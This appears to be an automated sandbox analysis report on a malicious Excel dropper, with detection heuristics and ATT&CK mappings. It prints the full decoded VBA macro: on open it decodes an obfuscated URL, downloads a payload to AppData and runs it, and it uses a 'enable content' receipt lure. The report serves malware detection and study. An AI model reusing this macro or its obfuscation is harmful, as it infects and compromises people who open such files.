MALICIOUS
276
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that executes code. This code uses the URLDownloadToFile API to download a second-stage payload from a URL constructed from obfuscated strings and saves it to the AppData directory. The macro also references ShellExecuteA, indicating an intent to execute the downloaded file. The document body contains a lure to 'enable content' to view a transaction receipt, further supporting its role as a dropper.
Heuristics 8
-
ClamAV: Xls.Dropper.Agent-7776231-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7776231-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function xstrwib Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal iLnXosvmLoTDzoIy As Long, ByVal pDNwwjV As String, _ ByVal wSguctfj As String, ByVal IxuoGDZwUbWimA As Long, ByVal VXhql As Long) As Long -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx = GJCgcgjggcCc("fyf/fyss") JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx = Environ$("AppData") & "\" & GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13484 bytes |
SHA-256: 8b455a43231021b6664cadca3d26e079cc996db75dfa1b5c9cced5c0db8566b2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Frinm()
End Sub
Attribute VB_Name = "WilGhnMkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function xbFplZu Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal Ofx As Long, ByVal RlfUAJ As String, _
ByVal JHMyrydpp As String, ByVal EILDcrkT As String, ByVal BEYBF As String, ByVal TezMz As Long) As Long
Private Declare PtrSafe Function xstrwib Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal iLnXosvmLoTDzoIy As Long, ByVal pDNwwjV As String, _
ByVal wSguctfj As String, ByVal IxuoGDZwUbWimA As Long, ByVal VXhql As Long) As Long
Private Sub TuZyYpYcV()
Dim ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv As String
Dim GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx As String
Dim JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx As String
Dim GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV As String
Dim MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh As String
Dim UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh As String
GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx = GJCgcgjggcCc("fyf/fyss")
JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx = Environ$("AppData") & "\" & GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx
ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv = GJCgcgjggcCc("fyf/KLKOLEDWIHIIZUX0F[OPSC0mq/{jc/eqvujyjnfmjo/xxx00;tquui")
xstrwib 0, ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv, JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx, 0, 0
xbFplZu 0, "open", JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx, "", vbNullString, vbNormalFocus
End Sub
Private Sub Workbook_Open()
TuZyYpYcV
End Sub
Public Function JHBMMBHJvhvhvVFfhFDDD3333333reedd(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 642.162
Dim columnwall As Byte
columnwall = 44414.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 564.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = vbNullString
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
Public Function HJvhvhvVFfhFDDD3333333reedd(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 42.162
Dim columnwall As Byte
columnwall = 44414.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 64.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = ""
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 89.252 Then
Dim flamesight As Byte
flamesight = 112.797
Dim sweartrust As Long
sweartrust = 35.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
Private Function GJCgcgjggcCc(enc)
Dim x, v, AppData
enc = StrReverse(enc)
For v = 1 To Len(enc)
x = Mid(enc, v, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
GJCgcgjggcCc = AppData
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_f8a1t7q1
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 952 bytes
' Line #0:
' FuncDefn (Sub RlfUAJ())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/WilGhnMkbook - 7837 bytes
' Line #0:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function EILDcrkT Lib "wSguctfj" (ByVal BEYBF As Long, ByVal TezMz As String, ByVal shell32.dll As String, ByVal xstrwib As String, ByVal iLnXosvmLoTDzoIy As String, ByVal pDNwwjV As Long) As Long)
' Line #1:
' Line #2:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function IxuoGDZwUbWimA Lib "JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx" (ByVal VXhql As Long, ByVal urlmon As String, ByVal TuZyYpYcV As String, ByVal ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv As Long, ByVal GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx As Long) As Long)
' Line #3:
' Line #4:
' FuncDefn (Private Sub GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV())
' Line #5:
' Dim
' VarDefn MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh (As String)
' Line #6:
' Dim
' VarDefn UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh (As String)
' Line #7:
' Dim
' VarDefn GJCgcgjggcCc (As String)
' Line #8:
' Dim
' VarDefn Environ (As String)
' Line #9:
' Dim
' VarDefn vbNullString (As String)
' Line #10:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #11:
' LitStr 0x0008 "fyf/fyss"
' ArgsLd Workbook_Open 0x0001
' St UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh
' Line #12:
' LitStr 0x0007 "AppData"
' ArgsLd Sheet1$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh
' Concat
' St GJCgcgjggcCc
' Line #13:
' Line #14:
' Line #15:
' LitStr 0x003A "fyf/KLKOLEDWIHIIZUX0F[OPSC0mq/{jc/eqvujyjnfmjo/xxx00;tquui"
' ArgsLd Workbook_Open 0x0001
' St MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh
' Line #16:
' Line #17:
' LitDI2 0x0000
' Ld MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh
' Ld GJCgcgjggcCc
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall IxuoGDZwUbWimA 0x0005
' Line #18:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld GJCgcgjggcCc
' LitStr 0x0000 ""
' Ld Sheet2
' Ld Sheet3
' ArgsCall EILDcrkT 0x0006
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Workbook())
' Line #22:
' Line #23:
' ArgsCall GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV 0x0000
' Line #24:
' EndSub
' Line #25:
' Line #26:
' FuncDefn (Public Function be3a8c1f30f1abadd648e22b16fdb57d5(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #27:
' LitStr 0x0001 "*"
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' Concat
' LitStr 0x0001 "*"
' Concat
' St t0ea0a0840384a15e019665b2e996b73f
' Line #28:
' Dim
' VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #29:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St dhmpmrvyvrxwv
' Line #30:
' Dim
' VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #31:
' LitR8 0x353F 0xBA5E 0xAFCD 0x40E5
' St m974e3e334b64ac13b6dec997fbabf21f
' Line #32:
' Dim
' VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #33:
' LitR8 0x8312 0xCAC0 0xA7A1 0x4081
' St b08576ffe41cb67690655f1261f410844
' Line #34:
' Dim
' VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #35:
' LitR8 0xB852 0x851E 0xF8EB 0x408B
' St z2c55929d38494d4bf3ab6ba3dd16305c
' Line #36:
' Ld Sheet2
' St b9d76f7072ca3da29e82e55579143fba0
' Line #37:
' Dim
' VarDefn kqeepfyakmzwuediw (As String)
' Line #38:
' LitStr 0x000B "naiveremove"
' St kqeepfyakmzwuediw
' Line #39:
' Dim
' VarDefn flamesight (As Byte)
' Line #40:
' LitR8 0x3127 0xAC08 0x3A1C 0x4033
' St flamesight
' Line #41:
' Dim
' VarDefn sweartrust (As Boolean)
' Line #42:
' LitR8 0xE560 0x22D0 0x79DB 0x4057
' St sweartrust
' Line #43:
' Dim
' VarDefn prqhhqrabc (As Double)
' Line #44:
' LitR8 0x7CEE 0x353F 0x2A5E 0x405B
' St prqhhqrabc
' Line #45:
' Ld columnwall
' Ld t0ea0a0840384a15e019665b2e996b73f
' Like
' Not
' IfBlock
' Line #46:
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' St b9d76f7072ca3da29e82e55579143fba0
' Line #47:
' Dim
' VarDefn HJvhvhvVFfhFDDD3333333reedd (As Double)
' Line #48:
' LitR8 0x2B02 0x1687 0xBED9 0x404E
' St HJvhvhvVFfhFDDD3333333reedd
' Line #49:
' Ld HJvhvhvVFfhFDDD3333333reedd
' LitR8 0xD2F2 0x624D 0xA810 0x4067
' Ne
' IfBlock
' Line #50:
' Dim
' VarDefn enc (As Byte)
' Line #51:
' LitR8 0xDD2F 0x0624 0x9981 0x406A
' St enc
' Line #52:
' Dim
' VarDefn x (As Long)
' Line #53:
' LitR8 0xAC08 0x5A1C 0x7F64 0x406D
' St x
' Line #54:
' Dim
' VarDefn n (As String)
' Line #55:
' LitStr 0x000C "fadzjgdilazu"
' St n
' Line #56:
' EndIfBlock
' Line #57:
' EndFunc
' Line #58:
' FuncDefn (Public Function AppData(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #59:
' LitStr 0x0001 "*"
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' Concat
' LitStr 0x0001 "*"
' Concat
' St t0ea0a0840384a15e019665b2e996b73f
' Line #60:
' Dim
' VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #61:
' LitR8 0xF9DB 0x6A7E 0x14BC 0x4045
' St dhmpmrvyvrxwv
' Line #62:
' Dim
' VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #63:
' LitR8 0x353F 0xBA5E 0xAFCD 0x40E5
' St m974e3e334b64ac13b6dec997fbabf21f
' Line #64:
' Dim
' VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #65:
' LitR8 0x1893 0x5604 0x3D0E 0x4050
' St b08576ffe41cb67690655f1261f410844
' Line #66:
' Dim
' VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #67:
' LitR8 0xB852 0x851E 0xF8EB 0x408B
' St z2c55929d38494d4bf3ab6ba3dd16305c
' Line #68:
' LitStr 0x0000 ""
' St b9d76f7072ca3da29e82e55579143fba0
' Line #69:
' Dim
' VarDefn kqeepfyakmzwuediw (As String)
' Line #70:
' LitStr 0x000B "naiveremove"
' St kqeepfyakmzwuediw
' Line #71:
' Dim
' VarDefn flamesight (As Byte)
' Line #72:
' LitR8 0x3127 0xAC08 0x3A1C 0x4033
' St flamesight
' Line #73:
' Dim
' VarDefn sweartrust (As Boolean)
' Line #74:
' LitR8 0xE560 0x22D0 0x79DB 0x4057
' St sweartrust
' Line #75:
' Dim
' VarDefn prqhhqrabc (As Double)
' Line #76:
' LitR8 0x7CEE 0x353F 0x2A5E 0x405B
' St prqhhqrabc
' Line #77:
' Ld columnwall
' Ld t0ea0a0840384a15e019665b2e996b73f
' Like
' Not
' IfBlock
' Line #78:
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' St b9d76f7072ca3da29e82e55579143fba0
' Line #79:
' Dim
' VarDefn HJvhvhvVFfhFDDD3333333reedd (As Double)
' Line #80:
' LitR8 0x2B02 0x1687 0xBED9 0x404E
' St HJvhvhvVFfhFDDD3333333reedd
' Line #81:
' Ld HJvhvhvVFfhFDDD3333333reedd
' LitR8 0xA5E3 0xC49B 0x5020 0x4056
' Ne
' IfBlock
' Line #82:
' Dim
' VarDefn enc (As Byte)
' Line #83:
' LitR8 0xBA5E 0x0C49 0x3302 0x405C
' St enc
' Line #84:
' Dim
' VarDefn x (As Long)
' Line #85:
' LitR8 0xB021 0x6872 0xFD91 0x4041
' St x
' Line #86:
' Dim
' VarDefn n (As String)
' Line #87:
' LitStr 0x000C "fadzjgdilazu"
' St n
' Line #88:
' EndIfBlock
' Line #89:
' EndFunc
' Line #90:
' Line #91:
' FuncDefn (Private Function Workbook_Open(StrReverse, id_FFFE As Variant))
' Line #92:
' Dim
' VarDefn Chr
' VarDefn id_029A
' VarDefn v
' Line #93:
' Ld StrReverse
' ArgsLd id_0294 0x0001
' St StrReverse
' Line #94:
' StartForVariable
' Ld id_029A
' EndForVariable
' LitDI2 0x0001
' Ld StrReverse
' FnLen
' For
' Line #95:
' Ld StrReverse
' Ld id_029A
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St Chr
' Line #96:
' Ld v
' Ld Chr
' ArgsLd id_0298 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd id_0296 0x0001
' Concat
' St v
' Line #97:
' StartForVariable
' Next
' Line #98:
' Ld v
' St Workbook_Open
' Line #99:
' EndFunc
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.